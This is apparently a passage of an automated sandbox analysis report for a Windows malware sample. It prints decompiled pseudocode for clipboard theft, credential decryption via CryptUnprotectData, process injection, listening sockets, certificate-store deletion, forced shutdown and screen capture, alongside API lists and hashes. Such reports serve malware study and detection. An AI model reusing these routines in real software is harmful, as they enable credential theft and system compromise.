    				if(_t23 == 0 || _t25 != 1 && _t25 != 0xd && _t25 != 7) {
    					L20:
    					return _a4;
    				} else {
    					_t21 = GlobalLock(_t23);
    					if(_t21 == 0) {
    						L19:
    						goto L20;
    					}
    					_t11 = _t25 - 1;
    					if(_t11 == 0) {
    						_push(_t21);
    						_push(0);
    						L12:
    						_t24 = E00411F3E(_t11 | 0xffffffff);
    						L15:
    						if(_t24 != 0) {
    							EnterCriticalSection(0x422b14);
    							E00410179(0x403398);
    							E00410179(_t24);
    							LeaveCriticalSection(0x422b14);
    							if(_t24 != _t21) {
    								E00411CFE(_t24);
    							}
    						}
    						GlobalUnlock(_a4);
    						goto L19;
    					}
    					_t11 = _t11 - 6;
    					if(_t11 == 0) {
    						_push(_t21);
    						_push(1);
    						goto L12;
    					}
    					if(_t11 != 6) {
    						_t24 = _a4;
    					} else {
    						_t24 = _t21;
    					}
    					goto L15;
    				}
    			}









    APIs
    • GetClipboardData.USER32 ref: 00410485
      • Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,0040B77D,000002F4,00000000,000002F4,909011A5,00000002), ref: 0041CB61
    • GlobalLock.KERNEL32 ref: 004104B9
    • EnterCriticalSection.KERNEL32(00422B14,00000000,00000000), ref: 004104F9
    • LeaveCriticalSection.KERNEL32(00422B14,00000000,00403398), ref: 00410510
    • GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 00410523
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockObjectSingleUnlockWait
    • String ID:
    • API String ID: 1109978993-0
    • Opcode ID: ebfa1400838b891feb8560f82bc0cf4e1244d28a4c5dfe9a8f73015e3ecee2ce
    • Instruction ID: 9316c05431471cb8acb72dba24519c8c4a49c2460646c834cff9cf75c252eaa2
    • Opcode Fuzzy Hash: ebfa1400838b891feb8560f82bc0cf4e1244d28a4c5dfe9a8f73015e3ecee2ce
    • Instruction Fuzzy Hash: AD11EB36600115F786215B699DC49FF375A9F86364B150027FB05A7310DBFC8DC246ED
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041737C(WCHAR* __ecx, void* __eflags) {
    				struct _WIN32_FIND_DATAW _v596;
    				short _v1116;
    				WCHAR* _t38;
    				void* _t42;
    
    				_t38 = __ecx;
    				if(E00417593("*",  &_v1116, __ecx) == 0) {
    					L9:
    					SetFileAttributesW(_t38, 0x80);
    					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
    				}
    				_t42 = FindFirstFileW( &_v1116,  &_v596);
    				if(_t42 == 0xffffffff) {
    					goto L9;
    				} else {
    					goto L2;
    				}
    				do {
    					L2:
    					if(E00417193( &(_v596.cFileName)) == 0 && E00417593( &(_v596.cFileName),  &_v1116, _t38) != 0) {
    						_t51 = _v596.dwFileAttributes & 0x00000010;
    						if((_v596.dwFileAttributes & 0x00000010) == 0) {
    							E00417064( &_v1116);
    						} else {
    							E0041737C( &_v1116, _t51);
    						}
    					}
    				} while (FindNextFileW(_t42,  &_v596) != 0);
    				FindClose(_t42);
    				goto L9;
    			}








    APIs
      • Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2
    • FindFirstFileW.KERNEL32(?,?,?,?), ref: 004173AD
    • FindNextFileW.KERNEL32(00000000,?), ref: 00417408
    • FindClose.KERNEL32(00000000), ref: 00417413
    • SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 0041741F
    • RemoveDirectoryW.KERNEL32(?), ref: 00417426
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
    • String ID:
    • API String ID: 765042924-0
    • Opcode ID: 30dfe49036167bfe71b97cc88243e62c06521ce2a33e9c24c2a3a0a51725a8bd
    • Instruction ID: 3e5d87d186edd761a55151997939db3d88ab0930beb10ec9bc58babd760515b7
    • Opcode Fuzzy Hash: 30dfe49036167bfe71b97cc88243e62c06521ce2a33e9c24c2a3a0a51725a8bd
    • Instruction Fuzzy Hash: 8C1186710082086AC620EB64DD49ADB77BC9F49354F04453BFDA5D3191EB389589C65A
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,00401638), ref: 0040555F
    • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 00405578
    • CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,0041D150), ref: 00405583
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040558B
    • CertCloseStore.CRYPT32(00000000,00000000), ref: 00405597
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
    • String ID:
    • API String ID: 1842529175-0
    • Opcode ID: d698f9ca710386ec24f8c07afe637ed4556750a7e5d7d9c82cfd7bb33a3a7934
    • Instruction ID: 45d8b86215d559ca91a97c31493e1a1e26ad7f14d1c1cdc1bc4eb9ef6be05b64
    • Opcode Fuzzy Hash: d698f9ca710386ec24f8c07afe637ed4556750a7e5d7d9c82cfd7bb33a3a7934
    • Instruction Fuzzy Hash: 56F0A0322826107BD62117356E08FFBBB6CDB52B61B040133FA85F32A48E398841897C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00418801(void* __ebx, void* __ecx) {
    				signed int _v124;
    				signed char _t12;
    
    				_t12 =  *0x423a30;
    				if((_t12 & 0x00000010) == 0) {
    					__eflags = _t12 & 0x00000008;
    					if(__eflags != 0) {
    						E004115E4(__ebx, __ecx, __eflags);
    						_t12 =  *0x423a30;
    					}
    					__eflags = _t12 & 0x00000003;
    					if((_t12 & 0x00000003) == 0) {
    						__eflags = _t12 & 0x00000004;
    						if((_t12 & 0x00000004) != 0) {
    							goto L8;
    						}
    						goto L9;
    					} else {
    						E004133CA(L"SeShutdownPrivilege");
    						__eflags = 0;
    						__imp__InitiateSystemShutdownExW(0, 0, 0, 1,  *0x423a30 >> 0x00000001 & 0x00000001, 0x80000000);
    						return 0;
    					}
    				} else {
    					_t12 = E0040B2E7( &_v124);
    					if(_t12 != 0) {
    						_v124 = _v124 | 0x00000020;
    						 *0x423b60 =  *0x423b60 | 0x00000010;
    						E0040B33F( &_v124);
    						L8:
    						return ExitWindowsEx(0x14, 0x80000000);
    					}
    					L9:
    					return _t12;
    				}
    			}






    APIs
    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 00418866
      • Part of subcall function 0040B2E7: CreateMutexW.KERNEL32(00423B98,00000000,00422848,?,?,0040524D,?,?,?,743C152E,00000002), ref: 0040B30D
    • ExitWindowsEx.USER32(00000014,80000000), ref: 00418879
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: CreateExitInitiateMutexShutdownSystemWindows
    • String ID: $SeShutdownPrivilege
    • API String ID: 3829579691-2253681161
    • Opcode ID: 56b4027c38f657f17d2812033e605c80f5d9dc10696594b65ccd137a3e46f85c
    • Instruction ID: 7761114d76ae48d161dea7f7beec0a2c414beac69ad4441a4d651e77918615eb
    • Opcode Fuzzy Hash: 56b4027c38f657f17d2812033e605c80f5d9dc10696594b65ccd137a3e46f85c
    • Instruction Fuzzy Hash: 7CF0DB31A1024459EA10ABB55D46BEA3B78A700749F94003EE982F21A2CB7CD542CB6C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00416662(void* __eax, void* _a4) {
    				char _v5;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				long _v24;
    				void* _t37;
    				void* _t42;
    				intOrPtr* _t43;
    				int _t44;
    				long _t46;
    				void* _t47;
    				SIZE_T* _t48;
    				signed int _t50;
    				void* _t52;
    				void* _t54;
    				void* _t55;
    				void* _t60;
    				intOrPtr _t61;
    				intOrPtr _t62;
    				unsigned int _t64;
    
    				_t55 = __eax;
    				_t60 =  *((intOrPtr*)(__eax + 0x3c)) + __eax;
    				_t46 =  *(_t60 + 0x50);
    				_v24 = _t46;
    				_v5 = 0;
    				if(IsBadReadPtr(__eax, _t46) == 0) {
    					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
    					_v12 = _t37;
    					__eflags = _t37;
    					if(__eflags == 0) {
    						L17:
    						return _v12;
    					}
    					_t47 = E00411D51(__eflags, _t55, _t46);
    					_t48 = 0;
    					__eflags = _t47;
    					if(_t47 == 0) {
    						L16:
    						VirtualFreeEx(_a4, _v12, 0, 0x8000);
    						_t32 =  &_v12;
    						 *_t32 = _v12 & 0x00000000;
    						__eflags =  *_t32;
    						goto L17;
    					}
    					__eflags =  *(_t60 + 0xa4);
    					if( *(_t60 + 0xa4) <= 0) {
    						L15:
    						E00411CFE(_t47);
    						__eflags = _v5;
    						if(_v5 != 0) {
    							goto L17;
    						}
    						goto L16;
    					}
    					_t42 =  *(_t60 + 0xa0);
    					__eflags = _t42;
    					if(_t42 <= 0) {
    						goto L15;
    					}
    					_t61 =  *((intOrPtr*)(_t60 + 0x34));
    					_t54 = _v12 - _t61;
    					_v20 = _t55 - _t61;
    					_t43 = _t42 + _t47;
    					while(1) {
    						__eflags =  *_t43 - _t48;
    						if( *_t43 == _t48) {
    							break;
    						}
    						_t62 =  *((intOrPtr*)(_t43 + 4));
    						__eflags = _t62 - 8;
    						if(_t62 < 8) {
    							L12:
    							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
    							_t48 = 0;
    							__eflags = 0;
    							continue;
    						}
    						_t64 = _t62 + 0xfffffff8 >> 1;
    						__eflags = _t64;
    						_v16 = _t48;
    						if(_t64 == 0) {
    							goto L12;
    						} else {
    							goto L9;
    						}
    						do {
    							L9:
    							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
    							__eflags = _t50;
    							if(_t50 != 0) {
    								_t52 = (_t50 & 0x00000fff) +  *_t43;
    								_t19 = _t52 + _t47;
    								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
    								__eflags =  *_t19;
    							}
    							_v16 = _v16 + 1;
    							__eflags = _v16 - _t64;
    						} while (_v16 < _t64);
    						goto L12;
    					}
    					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
    					__eflags = _t44;
    					_t28 =  &_v5;
    					 *_t28 = _t44 != 0;
    					__eflags =  *_t28;
    					goto L15;
    				}
    				return 0;
    			}
























    APIs
    • IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,73BCF560,00000000), ref: 0041667E
    • VirtualAllocEx.KERNEL32(73BCF560,00000000,?,00003000,00000040,?,73BCF560,00000000), ref: 0041669C
    • WriteProcessMemory.KERNEL32(73BCF560,73BCF560,00000000,?,00000000,?,?,?,73BCF560,00000000), ref: 0041672E
    • VirtualFreeEx.KERNEL32(73BCF560,73BCF560,00000000,00008000,?,?,?,73BCF560,00000000), ref: 00416753
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: Virtual$AllocFreeMemoryProcessReadWrite
    • String ID:
    • API String ID: 1273498236-0
    • Opcode ID: 2cdee3e925f538f2e825fe1f836a20dfb11487f350e492fa66c74712feab3025
    • Instruction ID: 947996b37b97a478577bde6272c5bebec2ec23415ca3f1b0a449d75cbd2fb5db
    • Opcode Fuzzy Hash: 2cdee3e925f538f2e825fe1f836a20dfb11487f350e492fa66c74712feab3025
    • Instruction Fuzzy Hash: 5731B272E00219AFCF119F64CD84BAEBBB5EF05749F06806AE911B72A0C774DD81CB58
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(00000000,00000001,00000006), ref: 00414E49
    • bind.WS2_32(00000000,?,-0000001D), ref: 00414E69
    • listen.WS2_32(00000000,?), ref: 00414E78
    • closesocket.WS2_32(00000000), ref: 00414E83
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: bindclosesocketlistensocket
    • String ID:
    • API String ID: 952684215-0
    • Opcode ID: 7bf398db5b36a079c17405aa6493f4fc5826d317daff90d150d2c74fdfc1f8e0
    • Instruction ID: 11b3e49bed4bc1792e8eb1af202bf7c0fdb2d36201ad90ced13dba67e7b385fe
    • Opcode Fuzzy Hash: 7bf398db5b36a079c17405aa6493f4fc5826d317daff90d150d2c74fdfc1f8e0
    • Instruction Fuzzy Hash: 92F0A03220020276D6202F399C09A6F29A9ABC27B0B044729F562D71F0E73888D2C524
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(00000000,00000002,00000011), ref: 00415127
    • bind.WS2_32(00000000,00000017,-0000001D), ref: 00415147
    • closesocket.WS2_32(00000000), ref: 00415152
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: bindclosesocketsocket
    • String ID:
    • API String ID: 1873677229-0
    • Opcode ID: d7c9bb762e09e6f33cd7c81b7000c6d35edcca1af1ec6799c644f1cdb5d6a7ea
    • Instruction ID: 404ff9780e0aad60a195eaa42af39461bf6160bd22d5545199e984db2d45807f
    • Opcode Fuzzy Hash: d7c9bb762e09e6f33cd7c81b7000c6d35edcca1af1ec6799c644f1cdb5d6a7ea
    • Instruction Fuzzy Hash: E6E04832600511B6D2201B3DAD4EBAF25A9ABC67B17144715B572D71E1E77888C29524
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E00408558(void* __eax, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
    				char _v5;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v44;
    				signed int _v48;
    				void* _v52;
    				char _v56;
    				char _v72;
    				void* _v96;
    				char _v196;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t48;
    				intOrPtr _t50;
    				intOrPtr _t52;
    				intOrPtr _t54;
    				signed int _t65;
    				void* _t66;
    				void* _t68;
    				char* _t70;
    				intOrPtr _t77;
    				signed int* _t82;
    				intOrPtr _t95;
    				void* _t97;
    				signed int _t100;
    				void* _t107;
    				void* _t109;
    				intOrPtr _t115;
    				char* _t117;
    				void* _t129;
    
    				_t121 = __eflags;
    				_t115 = _a4;
    				_push(_t115);
    				_t92 = __eax;
    				_t48 = E00408505(__eax, __eflags, 0x4c);
    				_push(_t115);
    				_v20 = _t48;
    				_t50 = E00408505(_t92, _t121, 0x4f);
    				_push(_t115);
    				_v24 = _t50;
    				_t52 = E00408505(_t92, _t121, 0x50);
    				_push(_t115);
    				_v28 = _t52;
    				_t54 = E00408505(_t92, _t121, 0x4d);
    				_push(_t115);
    				_v36 = _t54;
    				_v12 = E00408505(_t92, _t121, 0x4e);
    				_v5 = _v20 != 0;
    				if(_v5 != 0) {
    					_t95 = _v12;
    					_t65 = E0041284D(_t95);
    					if(_t95 != 0 && _t65 > 1) {
    						_t100 = _t65 & 0x80000001;
    						if(_t100 < 0) {
    							_t129 = (_t100 - 0x00000001 | 0xfffffffe) + 1;
    						}
    						if(_t129 == 0) {
    							asm("cdq");
    							_v48 = _t65 - _t107 >> 1;
    							_t77 = E00411CCE(_t65 - _t107 >> 1);
    							_v44 = _t77;
    							if(_t77 != 0) {
    								if(E0041253B(_v12, _t77) != 0) {
    									_t82 =  &_v48;
    									__imp__CryptUnprotectData(_t82, 0, _a8, 0, 0, 0,  &_v56);
    									if(_t82 == 1) {
    										_v16 = E004120BA(_v52);
    										LocalFree(_v52);
    									}
    								}
    								E00411CFE(_v44);
    							}
    						}
    					}
    					_t66 = 0x4b;
    					E00419897(_t66,  &_v196);
    					_t117 =  &_v72;
    					_t68 = 0x54;
    					E00419897(_t68, _t117);
    					_t70 = 0x403180;
    					_t109 =  ==  ? 0x403180 : _v16;
    					_t97 =  ==  ? 0x403180 : _v36;
    					_t135 = _v32;
    					if(_v32 != 0) {
    						_t70 = _t117;
    					}
    					_push(_t109);
    					_push(_t97);
    					_push(_t70);
    					_push(_v20);
    					E00412A7F(_a12, E0041284D( *_a12),  *_a12, _t135,  &_v196, _a4);
    					_t56 = E00411CFE(_v16);
    				}
    				E0041829C(E0041829C(E0041829C(E0041829C(E0041829C(_t56, _v20), _v24), _v28), _v36), _v12);
    				return _v5;
    			}







































    APIs
    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 0040864F
    • LocalFree.KERNEL32(?,?,?,?), ref: 0040866B
      • Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: Free$CryptDataHeapLocalUnprotect
    • String ID:
    • API String ID: 2231100991-0
    • Opcode ID: 83546d0f374413283a24d1b1a0e719b1824d0ab4ce93fb5f228e4be05f1dd9c8
    • Instruction ID: bad3ed207913765fbdd3518d60a1121896a50990c5b78a35351ef4833824f4c5
    • Opcode Fuzzy Hash: 83546d0f374413283a24d1b1a0e719b1824d0ab4ce93fb5f228e4be05f1dd9c8
    • Instruction Fuzzy Hash: 1A518C71E00219AACF10AFE58D55AEEBBB5AF44314F10483EF204F7291DA395D818F98
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • select.WS2_32(00000000,?,00000000,00000000,00000001), ref: 00414C8E
    • recv.WS2_32(?,?,00000000,00000000), ref: 00414CA6
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: recvselect
    • String ID:
    • API String ID: 741273618-0
    • Opcode ID: d27074ca6ff0152fc814da5042489ef2e2975e8bf85304e79dd373f91d493134
    • Instruction ID: cbc4cd370e52f3b779bd05d4a546fe94bfa2f7a2968d32836dc9d12444f789ae
    • Opcode Fuzzy Hash: d27074ca6ff0152fc814da5042489ef2e2975e8bf85304e79dd373f91d493134
    • Instruction Fuzzy Hash: 38F0A4728011246BC7189F65CC449DE7E6DEF86320F108366B41AE51D1E6748A848FD4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E00408C77() {
    				signed int _v5;
    				void* _v12;
    				signed short* _v16;
    				char _v20;
    				void* _v24;
    				void* _v28;
    				void* _v32;
    				char _v36;
    				char _v40;
    				char _v56;
    				void* _v260;
    				char _v356;
    				char _v460;
    				void* __edi;
    				void* __esi;
    				char* _t52;
    				void* _t53;
    				void* _t55;
    				void* _t65;
    				intOrPtr* _t67;
    				intOrPtr* _t69;
    				intOrPtr* _t71;
    				intOrPtr* _t73;
    				intOrPtr* _t75;
    				intOrPtr* _t77;
    				intOrPtr* _t79;
    				intOrPtr* _t84;
    				intOrPtr* _t86;
    				void* _t87;
    				signed short* _t88;
    				intOrPtr _t96;
    				signed int _t113;
    				intOrPtr* _t117;
    				char* _t119;
    				char* _t121;
    
    				_t52 =  &_v32;
    				_v32 = 0;
    				__imp__CoCreateInstance(0x4015e0, 0, 0x4401, 0x4015c0, _t52);
    				if(_t52 != 0) {
    					L3:
    					_v16 = 0;
    					_t117 = 0;
    					L4:
    					if(_t117 == 0) {
    						return _t52;
    					}
    					_t53 = 0x39;
    					E00419897(_t53,  &_v56);
    					_t121 =  &_v40;
    					_t55 = 0x3a;
    					E00419897(_t55, _t121);
    					_push(_t121);
    					_push( &_v56);
    					_push(_t117);
    					_v20 = 0;
    					if( *((intOrPtr*)( *_t117 + 0xc))() != 0) {
    						L31:
    						 *((intOrPtr*)( *_t117 + 8))(_t117);
    						_push(0xcc);
    						return E00407DEB(_t114, _v20, 0x38);
    					}
    					_push( &_v12);
    					_push(_t117);
    					if( *((intOrPtr*)( *_t117 + 0x20))() != 0) {
    						goto L31;
    					}
    					_t65 = 0x3b;
    					E00419897(_t65,  &_v356);
    					_t67 = _v12;
    					 *((intOrPtr*)( *_t67 + 0xc))(_t67);
    					_t69 = _v12;
    					_push(_t69);
    					if( *((intOrPtr*)( *_t69 + 0x10))() != 0) {
    						L30:
    						_t71 = _v12;
    						 *((intOrPtr*)( *_t71 + 8))(_t71);
    						goto L31;
    					}
    					_t96 = 0x64;
    					do {
    						_t73 = _v12;
    						_t114 =  &_v28;
    						_push( &_v28);
    						_push(_t73);
    						if( *((intOrPtr*)( *_t73 + 0x14))() != 0) {
    							goto L28;
    						}
    						_t77 = _v28;
    						_t114 =  &_v24;
    						_push( &_v24);
    						_push(0x4015d0);
    						_push(_t77);
    						if( *((intOrPtr*)( *_t77))() != 0) {
    							L27:
    							_t79 = _v28;
    							 *((intOrPtr*)( *_t79 + 8))(_t79);
    							goto L28;
    						}
    						_v5 = 1;
    						while(1) {
    							_push(_v5 & 0x000000ff);
    							_push( &_v356);
    							_t114 = 0x34;
    							_t119 =  &_v460;
    							if(E004129F1( &_v356, _t114, _t119) <= 0) {
    								break;
    							}
    							_t86 = _v24;
    							_t114 = _t119;
    							_v36 = _t96;
    							_t87 =  *((intOrPtr*)( *_t86 + 0xc))(_t86, _t119, 0,  &_v260, _t96,  &_v36);
    							if(_t87 != 0) {
    								if(_t87 == 0x7a || _t87 == 1) {
    									L25:
    									_v5 = _v5 + 1;
    									if(_v5 <= _t96) {
    										continue;
    									}
    								}
    								break;
    							}
    							_t88 =  &_v260;
    							if(_v260 == 0) {
    								L18:
    								if( *_t88 != 0x40) {
    									_t88 = 0;
    								}
    								L20:
    								if(_t88 != 0 && E004120F2( &_v260 | 0xffffffff,  &_v20,  &_v260) != 0) {
    									E004120F2(1,  &_v20, 0x40317c);
    								}
    								goto L25;
    							}
    							_t113 = _v260 & 0x0000ffff;
    							while(_t113 != 0x40) {
    								_t88 =  &(_t88[1]);
    								_t113 =  *_t88 & 0x0000ffff;
    								if(_t113 != 0) {
    									continue;
    								}
    								goto L18;
    							}
    							goto L20;
    						}
    						_t84 = _v24;
    						 *((intOrPtr*)( *_t84 + 8))(_t84);
    						goto L27;
    						L28:
    						_t75 = _v12;
    						_push(_t75);
    					} while ( *((intOrPtr*)( *_t75 + 0x10))() == 0);
    					_t117 = _v16;
    					goto L30;
    				}
    				_t117 = _v32;
    				if(_t117 == 0) {
    					goto L3;
    				} else {
    					_v16 = _t117;
    					goto L4;
    				}
    			}







































    APIs
    • CoCreateInstance.OLE32(004015E0,00000000,00004401,004015C0,?), ref: 00408C9C
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: CreateInstance
    • String ID:
    • API String ID: 542301482-0
    • Opcode ID: 29d2465acf80fea60788e5167306540df64ebd56ca6c62ea8fe366a01babc130
    • Instruction ID: e965818b1f77cad446c5b149f8a52511fa65f25c3f72eb3bbdfeb98461b9f9aa
    • Opcode Fuzzy Hash: 29d2465acf80fea60788e5167306540df64ebd56ca6c62ea8fe366a01babc130
    • Instruction Fuzzy Hash: E7515D71A00209ABDB10DBA1C984AEFB778FF98714F1444AEE545FB2C0DB79AD41CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00411E28() {
    				long _t7;
    				signed int _t8;
    				intOrPtr _t9;
    				void* _t11;
    				void* _t13;
    
    				_t11 = _t13 - 0x78;
    				_t7 = GetTimeZoneInformation(_t11 - 0x34);
    				if(_t7 != 1) {
    					if(_t7 != 2) {
    						_t8 = 0;
    					} else {
    						_t9 =  *((intOrPtr*)(_t11 + 0x74));
    						goto L4;
    					}
    				} else {
    					_t9 =  *((intOrPtr*)(_t11 + 0x20));
    					L4:
    					_t8 = (_t9 +  *(_t11 - 0x34)) * 0xffffffc4;
    				}
    				return _t8;
    			}

    APIs
    • GetTimeZoneInformation.KERNEL32(?), ref: 00411E37
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: InformationTimeZone
    • String ID:
    • API String ID: 565725191-0
    • Opcode ID: 09fcd8e40e31890f13ce203173545b96c56f290b75b689b4eeefc61c2ff40cf3
    • Instruction ID: a911ec4c4bc2daa0f7d9e1305cfd292a5883651eb70945fa8e8fbed54e8683bf
    • Opcode Fuzzy Hash: 09fcd8e40e31890f13ce203173545b96c56f290b75b689b4eeefc61c2ff40cf3
    • Instruction Fuzzy Hash: 83E086319442088BDB20DBE4EE45EDD77E9AB11308F200412FA42F6560E228D995C607
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
    • Instruction ID: 31d7c3956376ba80486ddbec97a1a05de8f6b8f05ccfb2966e9fcca8da9070aa
    • Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
    • Instruction Fuzzy Hash: 27E04F7AB801118BD755CA55D880983B7A6FBD9330B2286E6C81587745C938EDC3C5D5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 38%
    			E0041A6CC(WCHAR* _a4, char _a8, signed short _a12) {
    				struct HINSTANCE__* _v12;
    				struct HINSTANCE__* _v16;
    				struct HINSTANCE__* _v20;
    				_Unknown_base(*)()* _v24;
    				void* _v28;
    				void* _v32;
    				struct HDC__* _v36;
    				_Unknown_base(*)()* _v40;
    				_Unknown_base(*)()* _v44;
    				struct tagPOINT _v52;
    				_Unknown_base(*)()* _v56;
    				struct HINSTANCE__* _v60;
    				_Unknown_base(*)()* _v64;
    				_Unknown_base(*)()* _v68;
    				_Unknown_base(*)()* _v72;
    				_Unknown_base(*)()* _v76;
    				_Unknown_base(*)()* _v80;
    				_Unknown_base(*)()* _v84;
    				_Unknown_base(*)()* _v88;
    				struct HINSTANCE__* _v92;
    				struct HINSTANCE__* _v96;
    				struct HINSTANCE__* _v100;
    				char _v104;
    				_Unknown_base(*)()* _v108;
    				intOrPtr _v112;
    				char _v116;
    				_Unknown_base(*)()* _v120;
    				char _v148;
    				signed int _v152;
    				struct _ICONINFO _v172;
    				char _v188;
    				struct HINSTANCE__* _t169;
    				_Unknown_base(*)()* _t176;
    				struct HINSTANCE__* _t181;
    				_Unknown_base(*)()* _t182;
    				struct HINSTANCE__* _t183;
    				_Unknown_base(*)()* _t191;
    				struct HDC__* _t197;
    				struct HICON__* _t199;
    				signed int _t200;
    				intOrPtr _t202;
    				intOrPtr _t204;
    				void* _t206;
    				void* _t223;
    				intOrPtr* _t224;
    				void* _t239;
    				void* _t248;
    				unsigned int _t260;
    				intOrPtr* _t262;
    				signed short _t263;
    				intOrPtr _t264;
    				WCHAR** _t265;
    				intOrPtr _t268;
    				signed int _t269;
    				signed int _t272;
    				void* _t275;
    
    				_v32 = 0;
    				_v60 = 0;
    				_v16 = 0;
    				_v104 = 1;
    				_v100 = 0;
    				_v96 = 0;
    				_v92 = 0;
    				_t169 = LoadLibraryA("gdiplus.dll");
    				_v20 = _t169;
    				_v24 = GetProcAddress(_t169, "GdiplusStartup");
    				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
    				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
    				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
    				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
    				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
    				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
    				_v108 = _t176;
    				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
    					L66:
    					if(_v20 != 0) {
    						FreeLibrary(_v20);
    					}
    					if(_v60 != 0) {
    						FreeLibrary(_v60);
    					}
    					if(_v16 != 0) {
    						FreeLibrary(_v16);
    					}
    					return _v32;
    				} else {
    					_t181 = LoadLibraryA("ole32.dll");
    					_v60 = _t181;
    					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
    					_v120 = _t182;
